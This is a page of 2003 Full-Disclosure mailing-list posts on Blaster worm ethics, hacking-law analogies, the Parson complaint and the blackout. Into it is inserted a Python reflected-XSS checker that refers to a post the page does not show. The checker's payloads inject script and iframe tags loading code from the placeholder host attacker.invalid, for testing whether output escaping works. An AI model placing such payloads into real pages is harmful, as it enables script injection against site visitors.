[Full-Disclosure] unsubscribe list please
Linux user: 58887 Red Hat - CreativNet.info

** LEGAL NOTICE *** This message is intended solely for the person to whom it is addressed. It may contain confidential or legally protected information. Confidentiality or privilege is not waived by any faulty or erroneous transmission. If you have received this message in error, please delete the message and all its copies from your system immediately, destroy all copies of it on your hard disk and notify the sender. ** LEGAL NOTICE *** [EMAIL PROTECTED]
Re: [Full-Disclosure] MS Blaster author / morning_wood misinformed
--On Saturday, August 30, 2003 6:22 PM +0200 Peter Busser [EMAIL PROTECTED] wrote:

I don't know about US, Canadian, German or Chinese law. But in Dutch law there is a big difference between entering a house and stealing stuff and breaking into a house and stealing exactly the same stuff. Apparently the house owner has a responsibility of his own.

And the difference is?

Paul Schmehl ([EMAIL PROTECTED]) Adjunct Information Security Officer The University of Texas at Dallas AVIEN Founding Member http://www.utdallas.edu
Re: [Full-Disclosure] MS Blaster author / morning_wood misinformed
Whenever someone makes the analogy about breaking into someone's computer and breaking into someone's house, I always must suggest otherwise. Say I live across the street from you, and am out on my lawn talking to you while you're on your lawn, yelling across the street. And let's say that through this conversation, I get you to accidentally yell your social security number at me. (this is also assuming I don't do anything with your SS number) Whose fault is this?

I'm not saying that my analogy works better than yours, I'm just saying that there exists no perfect analogy between the electronic and physical world, and that applying conventional property laws to the internet (or intellectual property) is a bad idea. So could we all stop trying to force our instinctive reactions about cyber-ethics on everyone else, and actually think for a little while about what really is acceptable and unacceptable? Could we finally stop treating these definitely non-physical-world problems as such, and stop applying laws and ethics intended for physical property on issues that certainly have no connection to physical property?

This is a difficult topic. I certainly don't have the answers. But let's think about this first, not argue our first reactions.

On Sat, 2003-08-30 at 09:37, [EMAIL PROTECTED] wrote:

Hi Donald, Interesting (child-like) thoughts,

Interesting, to me it seems most child-like to attempt to apply concepts from a familiar world to an unfamiliar world, rather than trying to understand the unfamiliar world for what it is itself.
[Full-Disclosure] xss holes
Hi, are there any papers about XSS hole testing? My company is developing a new PHP app and wants to test it to make it a little more secure. thx

-- Servicios de Seguridad Informatica www.masev.cl
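The reflected-XSS vector morning_wood describes against the Trend Micro VName parameter, and the kind of test the question above asks for, as one added example that is not code from the thread, from Trend Micro or from any real PHP app. It is Python rather than PHP so it runs stand-alone; render_unescaped() is a hypothetical reconstruction of a page that drops a query parameter straight into its HTML, render_escaped() is the same page with the parameter escaped (the equivalent of htmlspecialchars() in PHP), and find_xss() feeds both a list of payloads of the shape shown in the thread. The attacker.invalid hosts and the payload list are constructed for illustration.

```python
"""Reflected-XSS check for a page that echoes a query parameter into HTML.

Added example, not code from the list thread, Trend Micro or any real app.
render_unescaped() is a hypothetical template constructed to reproduce the
behaviour described in the thread; attacker.invalid is a placeholder host.
"""
import html
from urllib.parse import parse_qs, urlsplit

# Payloads of the kind the thread shows: a remote script include, an iframe
# to an attacker-controlled host, and an attribute breakout. All constructed.
PAYLOADS = [
    '<script src="http://attacker.invalid/news.js"></script>',
    '<iframe src="http://attacker.invalid/exploit.html"></iframe>',
    '"><img src=x onerror=alert(1)>',
]

MARKUP_CHARS = '<>"\''


def vname_from_url(url):
    """Pull the VName query parameter out of a URL the way the page would."""
    qs = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return qs.get("VName", [""])[0]


def has_markup(value):
    """True if the value carries characters that can change HTML structure."""
    return any(c in value for c in MARKUP_CHARS)


def render_unescaped(vname):
    """Hypothetical vulnerable template: parameter inserted into HTML as-is."""
    return f"<html><body><h1>Virus details: {vname}</h1></body></html>"


def render_escaped(vname):
    """Hardened template: HTML-escape the parameter before inserting it."""
    safe = html.escape(vname, quote=True)
    return f"<html><body><h1>Virus details: {safe}</h1></body></html>"


def reflects_unescaped(render, payload):
    """True if the payload comes back byte-for-byte inside the rendered page."""
    return payload in render(payload)


def find_xss(render, payloads=PAYLOADS):
    """Return the payloads a renderer reflects without escaping."""
    return [p for p in payloads if reflects_unescaped(render, p)]


def check_url(url, render):
    """Simulate one request: extract VName from the URL and test the renderer.

    'reflected' is True only when the value contains markup and the page
    returns it verbatim; a plain virus name echoed back is not a finding.
    """
    value = vname_from_url(url)
    return {"param": value,
            "reflected": has_markup(value) and reflects_unescaped(render, value)}


if __name__ == "__main__":
    for name, render in (("unescaped", render_unescaped), ("escaped", render_escaped)):
        print(name, "reflects:", find_xss(render))
```

Against a live application the renderer is replaced by an HTTP fetch of the page with the payload in the parameter, and the check stays the same: the payload must not come back verbatim. Escaping on output is what turns the injected `<iframe>` into inert `&lt;iframe&gt;` text, which is why the hardened template passes every payload while the vulnerable one fails all three.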
Re: [Full-Disclosure] GOOD: A legal fix for software flaws?
In some mail from Jeremiah Cornelius, sie said:

Darren Reed wrote: I, for one, would not cry if the law made it impossible to sell or provide GPL'd software to people because it could not be provided with a disclaimer. Sooner or later the software industry needs to grow up and take responsibility for the crap that it unloads onto the world, pretending it to be a product worth using. GPL software especially.

You sir, were just flagged with the troll-bit across all your posts. The fact that you equate the production and use of software /only/ with an industry of some sort demonstrates the level of your indoctrination.

And I should care about this because...?

There are arguments for software as speech. I do not claim to support all of these - but you are clearly in the ideological camp of the control-freaks. When we can no longer use our machines for anything but software from a government provided white-list, and are unable to uninstall select bits - we will have people with positions like yours to thank.

Nope, you're wrong but if you don't understand why I might say that (and clearly you don't) then any argument from me will be wasted on you.

Jeremiah Cornelius, CISSP, CCNA, MCSE

And your comments quite clearly show that certifications do not equate to mental agility. Maybe you should stick to responding to topics that were covered in your exams for the said courses.

Darren
Re: [Full-Disclosure] The Jeffrey Parson criminal complaint is online
Richard M. Smith wrote: http://news.findlaw.com/nytimes/docs/cyberlaw/usparson82803cmp.pdf

Great link. Items of particular interest:

Page 9, lines 6-8: Since dl.t33kid.com is a copy of www.t33kid.com, it also can be used to capture IP addresses of compromised computers.

Isn't that reaching a bit, since the worm doesn't apparently know about dl.t33kid.com?

Page 10, lines 10-11: Microsoft expended significant internal and external (e.g., contracted) resources to respond to the DDoS attack launched by JEFFREY LEE PARSON.

Page 6, lines 12-14: Within three days, Blaster had infected an estimated one hundred thousand to two hundred thousand computers. By August 15, 2003, estimates were as high as more than one million infected computers.

Page 16, lines 16-18: ...at least 7,000 individual Internet users' computers were compromised by the variant of the Blaster worm that was released by JEFFREY LEE PARSON.

So, it sounds like he's responsible for 7,000 out of 100,000 to 1,000,000 infected computers. Unfortunately for him, he's the one stupid enough to use his handle in the code, so he's the one that shows up on CNN as the culprit for everything. While I do not wish to give the impression that I condone or mitigate the damage done by Parson's variant, I suspect he's going to get held responsible for the overall worm while interest in finding the original culprits wanes.

-- gowen -- Greg Owen -- [EMAIL PROTECTED] 79A7 4063 96B6 9974 86CA 3BEF 521C 860F 5A93 D66D
RE: [Full-Disclosure] MS Blaster author / morning_wood misinformed
| --On Saturday, August 30, 2003 6:22 PM +0200 Peter Busser [EMAIL PROTECTED] wrote:
|
| I don't know about US, Canadian, German or Chinese law. But in Dutch law there is a big difference between entering a house and stealing stuff and breaking into a house and stealing exactly the same stuff. Apparently the house owner has a responsibility of his own.
|
| And the difference is?
|
| Paul Schmehl ([EMAIL PROTECTED]) Adjunct Information Security Officer The University of Texas at Dallas AVIEN Founding Member http://www.utdallas.edu

Some jurisdictions view the defeating of a locked door differently than simply turning the knob on an unlocked door. Don't know why, but they do.
Re: [Full-Disclosure] MS Blaster author / morning_wood misinformed
Hi Paul,

The difference is Breaking and Entering vs Trespassing. They carry different penalties, just like Grand Theft Auto is not the same as Unauthorized Use of a vehicle. There are real differences in terms in arrests and judgements. Not that it really matters...

cheers, bob

On Sat, 30 Aug 2003, Paul Schmehl wrote:

--On Saturday, August 30, 2003 6:22 PM +0200 Peter Busser [EMAIL PROTECTED] wrote:

I don't know about US, Canadian, German or Chinese law. But in Dutch law there is a big difference between entering a house and stealing stuff and breaking into a house and stealing exactly the same stuff. Apparently the house owner has a responsibility of his own.

And the difference is?
[Full-Disclosure] Re: Fwd: Computers crashed just before blackout
Subject: Re: [Full-Disclosure] Fw: Computers crashed just before blackout To: Geoff Shively [EMAIL PROTECTED] Cc: [EMAIL PROTECTED] Date: Fri, 29 Aug 2003 18:25:05 -0400 (EDT)

(notes below...)

- Original Message - From: Richard M. Smith [EMAIL PROTECTED]

http://www.cleveland.com/news/plaindealer/index.ssf?/base/news/106207424774610.xml Computers crashed just before blackout

...

Yep, looks like the HMI systems (that allow the humans to see warnings and critical situations) and to manually reroute power went down. Bet you 30,000 quatros that those HMI systems communicated to the SCADA systems via DCOM.

...

You might be interested in an article we published last week:

--- Did the Worm Topple the Power Grid? The IT Safety of the US Power Supply

By now, the cause of the massive blackout in the United States has more or less been determined. But for several days after the blackout, the cause of the domino effect that pushed 21 power stations offline remained obscure. Numerous leads pointed to a link between the events and the W32.Lovsan worm that was simultaneously ravaging the Internet. Even if the ongoing investigations should eventually come to a different conclusion, one thing is certain: The IT systems of the energy utility companies are vulnerable.

http://www.heise.de/ct/english/03/18/034/

bye, ju

-- Juergen Schmidt Leitender Redakteur/senior editor c't magazin Heise Zeitschriften Verlag, Helstorferstr. 7, D-30625 Hannover Tel. +49 511 5352 300 FAX +49 511 5352 417 EMail [EMAIL PROTECTED]